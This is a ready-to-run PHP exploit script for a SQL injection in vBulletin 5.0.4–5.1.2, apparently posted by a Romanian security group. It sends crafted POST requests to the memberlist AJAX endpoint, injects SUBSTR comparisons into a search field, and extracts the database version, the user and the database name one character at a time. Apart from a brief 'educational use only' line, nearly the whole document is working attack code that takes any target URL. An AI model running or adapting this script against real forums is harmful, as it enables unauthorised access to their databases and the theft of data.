
[SCRIPT]=> EXPLOIT vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 and 5.1.2 (memberlist SQL injection)

  1. <?php
  2.  
  3. /*
SQL injection in vBulletin forums 5.0.4, 5.0.5, 5.1.0, 5.1.1 and 5.1.2 (exploit + video)
http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational use only: run it solely against forums you are authorised to test.
  9. */
  10.  
  11.  
  12. error_reporting(E_ALL);
  13. ini_set('display_errors', 1);
  14.  
  15.  
  16. // Get arguments
  17.  
  18.  
  19. $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
  20. $expression = str_replace('/', '\\/', $target_url);
  21.  
  22.  
  23. // Function to send a POST request
  24.  
  25.  
  26. function httpPost($url,$params)
  27. {
  28.     $ch = curl_init($url);
  29.  
  30.  
  31.     curl_setopt($ch, CURLOPT_URL,$url);
  32.     curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
  33.     curl_setopt($ch, CURLOPT_HEADER, false);
  34.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35.     curl_setopt($ch, CURLOPT_POST, 1);
  36.     curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
  37.      
  38.     curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  39.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  40.         'Accept: application/json, text/javascript, */*; q=0.01',
  41.         'X-Requested-With: XMLHttpRequest',
  42.         'Referer: https://rstforums.com/v5/memberlist',
  43.         'Accept-Language: en-US,en;q=0.5',
  44.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  45.      ));
  46.  
  47.  
  48.     $output = curl_exec($ch);
  49.      
  50.     if($output == FALSE) print htmlspecialchars(curl_error($ch));
  51.  
  52.  
  53.     curl_close($ch);
  54.     return $output;
  55. }
  56.  
  57.  
  58. // Function to get string between two other strings
  59.  
  60.  
  61. function get_string_between($string, $start, $end)
  62. {
  63.     $string = " ".$string;
  64.     $ini = strpos($string,$start);
  65.     if ($ini == 0) return "";
  66.     $ini += strlen($start);
  67.     $len = strpos($string,$end,$ini) - $ini;
  68.     return substr($string,$ini,$len);
  69. }
  70.  
  71.  
  72. // Get version
  73.  
  74.  
  75. print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
  76. print "Version: ";
  77.  
  78.  
  79. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  80.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
  81.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  82.  
  83.  
  84. $letter = 1;
  85.  
  86.  
  87. while(strpos($result, 'No Users Matched Your Query') == false)
  88. {
  89.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  90.  
  91.  
  92.     $username = get_string_between($exploded[1], '">', '<\/a>');
  93.     print $username[0];
  94.      
  95.     $letter++;
  96.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  97.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
  98.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  99. }
  100.  
  101.  
  102. // Get user
  103.  
  104.  
  105. print "\r\nUser: ";
  106.  
  107.  
  108. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  109.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
  110.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  111.  
  112.  
  113. $letter = 1;
  114.  
  115.  
  116. while(strpos($result, 'No Users Matched Your Query') == false)
  117. {
  118.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  119.  
  120.  
  121.     $username = get_string_between($exploded[1], '">', '<\/a>');
  122.     print $username[0];
  123.  
  124.  
  125.     $letter++;
  126.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  127.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
  128.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  129. }
  130.  
  131.  
  132. // Get database
  133.  
  134.  
  135. print "\r\nDatabse: ";
  136.  
  137.  
  138. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  139.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
  140.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  141.  
  142.  
  143. $letter = 1;
  144.  
  145.  
  146. while(strpos($result, 'No Users Matched Your Query') == false)
  147. {
  148.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  149.  
  150.  
  151.     $username = get_string_between($exploded[1], '">', '<\/a>');
  152.     print $username[0];
  153.  
  154.  
  155.     $letter++;
  156.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  157.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
  158.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  159. }
  160.  
  161.  
  162. print "\r\n"
  163.  
  164.  
  165. ?>